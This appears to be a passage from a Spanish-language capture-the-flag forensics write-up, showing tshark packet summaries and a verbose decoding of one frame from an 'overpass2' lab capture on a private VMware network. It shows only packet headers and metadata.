59 48.997335350 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894487870 TSecr=3256088284
60 52.615293905 192.168.170.145 → 192.168.170.159 TCP 80 4242 → 57680 [PSH, ACK] Seq=59 Ack=379 Win=65152 Len=14 TSval=3256112325 TSecr=894487468
61 52.615822285 192.168.170.159 → 192.168.170.145 TCP 81 57680 → 4242 [PSH, ACK] Seq=379 Ack=73 Win=64256 Len=15 TSval=894491489 TSecr=3256112325
62 52.615888056 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=394 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
63 52.616362367 192.168.170.159 → 192.168.170.145 TCP 117 57680 → 4242 [PSH, ACK] Seq=394 Ack=73 Win=64256 Len=51 TSval=894491489 TSecr=3256112326
64 52.616371067 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=445 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
65 52.616574160 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=445 Ack=73 Win=64256 Len=64 TSval=894491489 TSecr=3256112326
66 52.616619251 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=509 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
67 59.237795390 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256118947 TSecr=894487870
68 59.237911793 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894498111 TSecr=3256088284
69 69.478321357 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256129188 TSecr=894498111
70 69.478401749 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894508351 TSecr=3256088284
71 70.421572879 192.168.170.145 → 192.168.170.159 TCP 75 4242 → 57680 [PSH, ACK] Seq=73 Ack=509 Win=65152 Len=9 TSval=3256130131 TSecr=894491489
72 70.422063989 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=509 Ack=82 Win=64256 Len=10 TSval=894509294 TSecr=3256130131
73 70.422069829 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=82 Ack=519 Win=65152 Len=0 TSval=3256130131 TSecr=894509294
74 70.423887636 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=519 Ack=82 Win=64256 Len=10 TSval=894509296 TSecr=3256130131
75 70.423890196 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=82 Ack=529 Win=65152 Len=0 TSval=3256130133 TSecr=894509296
76 71.650622407 192.168.170.145 → 192.168.170.159 TCP 89 4242 → 57680 [PSH, ACK] Seq=82 Ack=529 Win=65152 Len=23 TSval=3256131360 TSecr=894509296
77 71.650937524 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=529 Ack=105 Win=64256 Len=2 TSval=894510523 TSecr=3256131360
78 71.650944424 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=105 Ack=531 Win=65152 Len=0 TSval=3256131360 TSecr=894510523
79 71.674926908 192.168.170.159 → 192.168.170.145 TCP 127 57680 → 4242 [PSH, ACK] Seq=531 Ack=105 Win=64256 Len=61 TSval=894510547 TSecr=3256131360
80 71.674933498 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=105 Ack=592 Win=65152 Len=0 TSval=3256131384 TSecr=894510547
81 79.718858510 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256139428 TSecr=894508351
82 79.718997584 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894518591 TSecr=3256088284
83 80.220669335 192.168.170.145 → 192.168.170.159 TCP 71 4242 → 57680 [PSH, ACK] Seq=105 Ack=592 Win=65152 Len=5 TSval=3256139930 TSecr=894510547
84 80.221093213 192.168.170.159 → 192.168.170.145 TCP 72 57680 → 4242 [PSH, ACK] Seq=592 Ack=110 Win=64256 Len=6 TSval=894519093 TSecr=3256139930
85 80.221191495 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=110 Ack=598 Win=65152 Len=0 TSval=3256139930 TSecr=894519093
86 80.221306458 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=598 Ack=110 Win=64256 Len=29 TSval=894519094 TSecr=3256139930
87 80.221365069 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=110 Ack=627 Win=65152 Len=0 TSval=3256139930 TSecr=894519094
88 82.384925514 192.168.170.145 → 192.168.170.159 TCP 75 4242 → 57680 [PSH, ACK] Seq=110 Ack=627 Win=65152 Len=9 TSval=3256142094 TSecr=894519094
89 82.385349973 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=627 Ack=119 Win=64256 Len=10 TSval=894521257 TSecr=3256142094
90 82.385355363 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=637 Win=65152 Len=0 TSval=3256142094 TSecr=894521257
91 82.386795163 192.168.170.159 → 192.168.170.145 TCP 579 57680 → 4242 [PSH, ACK] Seq=637 Ack=119 Win=64256 Len=513 TSval=894521259 TSecr=3256142094
92 82.386798183 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=1150 Win=64640 Len=0 TSval=3256142096 TSecr=894521259
93 82.387045417 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=1150 Ack=119 Win=64256 Len=29 TSval=894521259 TSecr=3256142096
94 82.387106419 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=1179 Win=64640 Len=0 TSval=3256142096 TSecr=894521259
95 85.689999379 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [PSH, ACK] Seq=119 Ack=1179 Win=64640 Len=8 TSval=3256145399 TSecr=894521259
96 85.690358617 192.168.170.159 → 192.168.170.145 TCP 75 57680 → 4242 [PSH, ACK] Seq=1179 Ack=127 Win=64256 Len=9 TSval=894524562 TSecr=3256145399
97 85.690407117 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=127 Ack=1188 Win=64640 Len=0 TSval=3256145399 TSecr=894524562
98 85.693199973 192.168.170.159 → 192.168.170.145 TCP 93 57680 → 4242 [PSH, ACK] Seq=1188 Ack=127 Win=64256 Len=27 TSval=894524565 TSecr=3256145399
99 85.693319126 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=127 Ack=1215 Win=64640 Len=0 TSval=3256145402 TSecr=894524565
100 87.592945663 192.168.170.145 → 192.168.170.159 TCP 89 4242 → 57680 [PSH, ACK] Seq=127 Ack=1215 Win=64640 Len=23 TSval=3256147302 TSecr=894524565
101 87.594143248 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=1215 Ack=150 Win=64256 Len=2 TSval=894526466 TSecr=3256147302
102 87.594229619 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=150 Ack=1217 Win=64640 Len=0 TSval=3256147303 TSecr=894526466
103 87.599894814 192.168.170.159 → 192.168.170.145 TCP 370 57680 → 4242 [PSH, ACK] Seq=1217 Ack=150 Win=64256 Len=304 TSval=894526472 TSecr=3256147303
104 87.599948715 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=150 Ack=1521 Win=64384 Len=0 TSval=3256147309 TSecr=894526472
105 89.958341754 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256149667 TSecr=894518591
106 89.958477887 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894528830 TSecr=3256088284
107 92.969168584 192.168.170.138 → 91.189.91.157 NTP 90 NTP Version 4, client
108 93.049609940 VMware_f9:85:10 → Broadcast ARP 60 Who has 192.168.170.138? Tell 192.168.170.2
109 93.049623211 VMware_82:6c:a5 → VMware_f9:85:10 ARP 42 192.168.170.138 is at 00:0c:29:82:6c:a5
110 93.049776854 91.189.91.157 → 192.168.170.138 NTP 90 NTP Version 4, server
111 95.931106336 192.168.170.145 → 192.168.170.159 TCP 87 4242 → 57680 [PSH, ACK] Seq=150 Ack=1521 Win=64384 Len=21 TSval=3256155640 TSecr=894526472
112 95.931488256 192.168.170.159 → 192.168.170.145 TCP 88 57680 → 4242 [PSH, ACK] Seq=1521 Ack=171 Win=64256 Len=22 TSval=894534803 TSecr=3256155640
113 95.931564807 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=1543 Win=64384 Len=0 TSval=3256155640 TSecr=894534803
114 95.935050278 192.168.170.159 → 192.168.170.145 TCP 1528 57680 → 4242 [PSH, ACK] Seq=1543 Ack=171 Win=64256 Len=1462 TSval=894534807 TSecr=3256155640
115 95.935095939 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=3005 Win=64128 Len=0 TSval=3256155644 TSecr=894534807
116 95.935531281 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=3005 Ack=171 Win=64256 Len=29 TSval=894534807 TSecr=3256155644
117 95.935587742 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=3034 Win=64128 Len=0 TSval=3256155644 TSecr=894534807
118 98.107828955 VMware_82:6c:a5 → VMware_f9:85:10 ARP 42 Who has 192.168.170.2? Tell 192.168.170.138
119 98.107934218 VMware_f9:85:10 → VMware_82:6c:a5 ARP 60 192.168.170.2 is at 00:50:56:f9:85:10
120 130.788992697 192.168.170.145 → 192.168.170.159 TCP 118 4242 → 57680 [PSH, ACK] Seq=171 Ack=3034 Win=64128 Len=52 TSval=3256190497 TSecr=894534807
121 130.789693015 192.168.170.159 → 192.168.170.145 TCP 121 57680 → 4242 [PSH, ACK] Seq=3034 Ack=223 Win=64256 Len=55 TSval=894569661 TSecr=3256190497
122 130.789742216 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3089 Win=64128 Len=0 TSval=3256190497 TSecr=894569661
123 130.790524817 192.168.170.159 → 192.168.170.145 TCP 98 57680 → 4242 [PSH, ACK] Seq=3089 Ack=223 Win=64256 Len=32 TSval=894569661 TSecr=3256190497
124 130.790594169 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3121 Win=64128 Len=0 TSval=3256190498 TSecr=894569661
125 130.812969381 192.168.170.159 → 192.168.170.2 DNS 81 Standard query 0xea9e A github.com OPT
126 130.813022012 192.168.170.159 → 192.168.170.2 DNS 81 Standard query 0xa865 AAAA github.com OPT
127 130.821353619 VMware_f9:85:10 → Broadcast ARP 60 Who has 192.168.170.159? Tell 192.168.170.2
128 130.821367729 VMware_6e:18:17 → VMware_f9:85:10 ARP 60 192.168.170.159 is at 00:0c:29:6e:18:17
129 130.821456311 192.168.170.2 → 192.168.170.159 DNS 165 Standard query response 0xa865 AAAA github.com SOA ns-1707.awsdns-21.co.uk OPT
130 130.834210483 192.168.170.2 → 192.168.170.159 DNS 97 Standard query response 0xea9e A github.com A 140.82.118.4 OPT
131 130.840570509 192.168.170.159 → 140.82.118.4 TCP 74 42174 → 443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=1118180778 TSecr=0 WS=128
132 130.868572111 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
133 130.868722995 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1 Ack=1 Win=64240 Len=0
134 130.894779433 192.168.170.159 → 140.82.118.4 TLSv1 290 Client Hello
135 130.894864666 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=1 Ack=237 Win=64240 Len=0
136 130.923858220 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Server Hello
137 130.923918441 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=237 Ack=1437 Win=63184 Len=0
138 130.924009433 140.82.118.4 → 192.168.170.159 TLSv1.2 2058 Certificate, Server Key Exchange, Server Hello Done
139 130.924070965 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=237 Ack=3441 Win=63184 Len=0
140 130.924943889 192.168.170.159 → 140.82.118.4 TLSv1.2 129 Client Key Exchange
141 130.925008519 192.168.170.159 → 140.82.118.4 TLSv1.2 105 Change Cipher Spec, Encrypted Handshake Message
142 130.925010399 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3441 Ack=312 Win=64240 Len=0
143 130.925010899 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3441 Ack=363 Win=64240 Len=0
144 131.038254985 140.82.118.4 → 192.168.170.159 TLSv1.2 105 Change Cipher Spec, Encrypted Handshake Message
145 131.038924192 192.168.170.159 → 140.82.118.4 TLSv1.2 282 Application Data
146 131.038973985 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3492 Ack=591 Win=64240 Len=0
147 131.405066405 140.82.118.4 → 192.168.170.159 TLSv1.2 474 Application Data
148 131.413988747 140.82.118.4 → 192.168.170.159 TLSv1.2 88 Application Data
149 131.414117629 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=3946 Win=63184 Len=0
150 131.415503346 140.82.118.4 → 192.168.170.159 TLSv1.2 408 Application Data
151 131.415743931 140.82.118.4 → 192.168.170.159 TLSv1.2 152 Application Data
152 131.415819643 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=4398 Win=63184 Len=0
153 131.416248475 140.82.118.4 → 192.168.170.159 TLSv1.2 86 Application Data
154 131.416464271 140.82.118.4 → 192.168.170.159 TLSv1.2 94 Application Data
155 131.416543553 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=4470 Win=63184 Len=0
156 131.418370130 192.168.170.159 → 140.82.118.4 TLSv1.2 490 Application Data
157 131.418445612 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=4470 Ack=1027 Win=64240 Len=0
158 131.738353327 140.82.118.4 → 192.168.170.159 TLSv1.2 422 Application Data
159 131.754083486 140.82.118.4 → 192.168.170.159 TLSv1.2 86 Application Data
160 131.754418814 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=4870 Win=63184 Len=0
161 131.754441005 140.82.118.4 → 192.168.170.159 TLSv1.2 93 Application Data
162 131.762910965 140.82.118.4 → 192.168.170.159 TLSv1.2 208 Application Data, Application Data
163 131.763032179 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=5063 Win=63184 Len=0
164 131.763155262 192.168.170.159 → 192.168.170.145 TCP 160 57680 → 4242 [PSH, ACK] Seq=3121 Ack=223 Win=64256 Len=94 TSval=894570634 TSecr=3256190498
165 131.763270215 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3215 Win=64128 Len=0 TSval=3256191471 TSecr=894570634
166 131.788967723 140.82.118.4 → 192.168.170.159 TLSv1.2 1406 Application Data
167 131.789534609 192.168.170.145 → 192.168.170.159 TCP 66 [TCP ACKed unseen segment] 4242 → 57680 [ACK] Seq=223 Ack=4860 Win=63488 Len=0 TSval=3256191497 TSecr=894570660
168 131.789545279 192.168.170.159 → 192.168.170.145 TCP 1711 [TCP Spurious Retransmission] 57680 → 4242 [PSH, ACK] Seq=3215 Ack=223 Win=64256 Len=1645 TSval=894570660 TSecr=3256191471
169 131.834482227 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=6415 Win=63184 Len=0
170 131.838951814 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
171 131.839037965 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=7814 Win=63184 Len=0
172 131.839105227 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
173 131.839150978 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=9213 Win=63184 Len=0
174 131.847695021 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
175 131.847756852 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=10612 Win=63184 Len=0
176 131.847865055 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
177 131.847870295 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=12048 Win=63184 Len=0
178 131.848434910 192.168.170.159 → 140.82.118.4 TCP 60 [TCP ACKed unseen segment] 42174 → 443 [ACK] Seq=1027 Ack=14846 Win=63184 Len=0
179 131.848437620 140.82.118.4 → 192.168.170.159 TCP 2852 [TCP Spurious Retransmission] 443 → 42174 [PSH, ACK] Seq=12048 Ack=1027 Win=64240 Len=2798
180 131.848852261 140.82.118.4 → 192.168.170.159 TLSv1.2 774 Ignored Unknown Record
181 131.848906412 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=15566 Win=63184 Len=0
182 131.849720413 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4860 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191497
183 131.849772045 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4894 Win=64128 Len=0 TSval=3256191557 TSecr=894570721
184 131.849868017 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4894 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191557
185 131.849869847 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4928 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
186 131.849980410 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4928 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
187 131.849982040 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4962 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
188 131.850048142 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4962 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
189 131.850124294 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4996 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
190 131.850181165 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4996 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
191 131.850182615 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5030 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
192 131.850278739 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=5030 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
193 131.850280589 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5064 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
194 131.850374910 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=5064 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
195 131.850376470 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5098 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
196 131.873954554 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
197 131.874032897 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=16965 Win=63184 Len=0
198 131.874433746 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
199 131.874441207 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=18401 Win=63184 Len=0
200 131.874636281 140.82.118.4 → 192.168.170.159 TLSv1.2 1416 Application Data
201 131.874638441 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=19763 Win=63184 Len=0
202 131.875027452 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
203 131.875054433 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=21162 Win=63184 Len=0
204 131.924706244 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
205 131.924810547 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=22561 Win=63184 Len=0
206 131.925254738 140.82.118.4 → 192.168.170.159 TLSv1.2 2210 Application Data, Application Data
207 131.925324681 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=24717 Win=63184 Len=0
208 132.044977929 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
209 132.045027690 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=26116 Win=63184 Len=0
210 132.045108132 140.82.118.4 → 192.168.170.159 TLSv1.2 2889 Application Data, Application Data
211 132.045156342 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=28951 Win=63184 Len=0
212 132.045575673 140.82.118.4 → 192.168.170.159 TLSv1.2 1416 Application Data
213 132.045640405 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=30313 Win=63184 Len=0
214 132.046020945 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
215 132.046175449 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=31749 Win=63184 Len=0
216 132.046181229 140.82.118.4 → 192.168.170.159 TLSv1.2 2815 Application Data, Application Data
217 132.046269741 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=34510 Win=63184 Len=0
218 132.046508518 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=37382 Win=63184 Len=0
219 132.046515448 140.82.118.4 → 192.168.170.159 TCP 2926 [TCP Spurious Retransmission] 443 → 42174 [PSH, ACK] Seq=34510 Ack=1027 Win=64240 Len=2872
220 132.046943999 140.82.118.4 → 192.168.170.159 TLSv1.2 2778 Ignored Unknown Record
221 132.046995951 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=40106 Win=63184 Len=0
222 132.047117094 140.82.118.4 → 192.168.170.159 TLSv1.2 1321 Application Data
223 132.047219827 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=41373 Win=63184 Len=0
224 132.094178628 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
225 132.094319951 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=42772 Win=63184 Len=0
226 132.094446085 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
227 132.129676781 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
228 132.129759233 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=45570 Win=63184 Len=0
229 132.129963958 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
230 132.130342869 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
231 132.130344819 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=48368 Win=63184 Len=0
232 132.171939650 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
233 132.172162936 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
234 132.172169976 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=51166 Win=63184 Len=0
235 132.178881331 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
236 132.179088046 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
237 132.179151938 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=53964 Win=63184 Len=0
238 132.213735698 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
239 132.214095967 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
240 132.214176359 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=56762 Win=63184 Len=0
RESTO DE LA INFO........
VEMOS UNA PARTE EN MODO VERBOSE:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -V
Running as user "root" and group "root". This could be dangerous.
Frame 1: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface ens33, id 0
Section number: 1
Interface id: 0 (ens33)
Interface name: ens33
Encapsulation type: Ethernet (1)
Arrival Time: Jul 21, 2020 17:33:53.162229164 -03
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1595363633.162229164 seconds
[Time delta from previous captured frame: 0.000000000 seconds]
[Time delta from previous displayed frame: 0.000000000 seconds]
[Time since reference or first frame: 0.000000000 seconds]
Frame Number: 1
Frame Length: 74 bytes (592 bits)
Capture Length: 74 bytes (592 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_17:ba:48 (00:0c:29:17:ba:48), Dst: VMware_6e:18:17 (00:0c:29:6e:18:17)
Destination: VMware_6e:18:17 (00:0c:29:6e:18:17)
Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: VMware_17:ba:48 (00:0c:29:17:ba:48)
Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
0100 .... = Version: 4
.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
0000 00.. = Differentiated Services Codepoint: Default (0)
.... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
Total Length: 60
Identification: 0xd0e5 (53477)
010. .... = Flags: 0x2, Don't fragment
0... .... = Reserved bit: Not set
.1.. .... = Don't fragment: Set
..0. .... = More fragments: Not set
...0 0000 0000 0000 = Fragment Offset: 0
Time to Live: 64
Protocol: TCP (6)
Header Checksum: 0x9354 [validation disabled]
[Header checksum status: Unverified]
Source Address: 192.168.170.145
Destination Address: 192.168.170.159
Transmission Control Protocol, Src Port: 47732, Dst Port: 80, Seq: 0, Len: 0
Source Port: 47732
Destination Port: 80
[Stream index: 0]
[Conversation completeness: Incomplete (0)]
[TCP Segment Len: 0]
Sequence Number: 0 (relative sequence number)
Sequence Number (raw): 2491250218
[Next Sequence Number: 1 (relative sequence number)]
Acknowledgment Number: 0
Acknowledgment number (raw): 0
1010 .... = Header Length: 40 bytes (10)
Flags: 0x002 (SYN)
000. .... .... = Reserved: Not set
...0 .... .... = Accurate ECN: Not set
.... 0... .... = Congestion Window Reduced: Not set
.... .0.. .... = ECN-Echo: Not set
.... ..0. .... = Urgent: Not set
.... ...0 .... = Acknowledgment: Not set
.... .... 0... = Push: Not set
.... .... .0.. = Reset: Not set
.... .... ..1. = Syn: Set
[Expert Info (Chat/Sequence): Connection establish request (SYN): server port 80]
[Connection establish request (SYN): server port 80]
[Severity level: Chat]
[Group: Sequence]
.... .... ...0 = Fin: Not set
[TCP Flags: ··········S·]
Window: 64240
[Calculated window size: 64240]
Checksum: 0x67cd [unverified]
[Checksum Status: Unverified]
Urgent Pointer: 0
Options: (20 bytes), Maximum segment size, SACK permitted, Timestamps, No-Operation (NOP), Window scale
TCP Option - Maximum segment size: 1460 bytes
Kind: Maximum Segment Size (2)
Length: 4
MSS Value: 1460
TCP Option - SACK permitted
Kind: SACK Permitted (4)
Length: 2
TCP Option - Timestamps
Kind: Time Stamp Option (8)
Length: 10
Timestamp value: 3256059711: TSval 3256059711, TSecr 0
Timestamp echo reply: 0
TCP Option - No-Operation (NOP)
Kind: No-Operation (1)
TCP Option - Window scale: 7 (multiply by 128)
Kind: Window Scale (3)
Length: 3
Shift count: 7
[Multiplier: 128]
[Timestamps]
[Time since first frame in this TCP stream: 0.000000000 seconds]
